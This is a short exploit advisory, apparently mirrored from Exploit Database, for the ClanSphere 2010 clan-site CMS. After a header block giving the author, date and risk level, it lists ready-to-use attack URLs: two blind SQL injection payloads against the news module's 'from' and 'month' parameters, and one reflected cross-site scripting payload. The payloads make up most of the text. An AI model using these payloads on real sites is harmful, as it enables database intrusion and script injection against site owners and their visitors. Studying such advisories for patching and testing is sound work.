ClanSphere 2010 – Multiple Vulnerabilities

• Exploit Database
• 18 阅读

• 作者： Sweet
  日期： 2010-08-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14742/

• ############################################################################
  ##
  # Exploit Title: Clansphere Multiple vulnerabilities #
  ##
  # Date: 24/08/2010 #
  ##
  # Author: Sweet#
  ##
  # Contact : charif38@hotmail.fr#
  ##
  # Software Link: #
  ## 
  # Download:http: http://sourceforge.net/projects/clansphere/ #
  ## 
  # Version: all #
  ##
  # Tested on: WinXp sp3 #
  ##
  # Risk : HIGHT #
  ##
  ##
  # Description :clansphere offers some nice features for# 
  ##
  # you to easily set up and maintain your proper clan site within minutes!#
  ##
  ############################################################################
  
  1- Blind Sql injection :
  
  http://www.target.com/clanspherepath/index.php?mod=news&action=recent&id=0&from=list'+and+31337-31337=0+--+
  
  http://www.target.com/clansphere/index.php?mod=news&action=recent&year=2009&month=8"+and+31337-31337=0+--+
  
  2-Xss :
  
  http://www.target.com/clansphere/index.php/>"><ScRiPt>alert("sweet")</ScRiPt>
  
  
  Saha Ftourkoum et 1,2,3 viva L'Algerie :))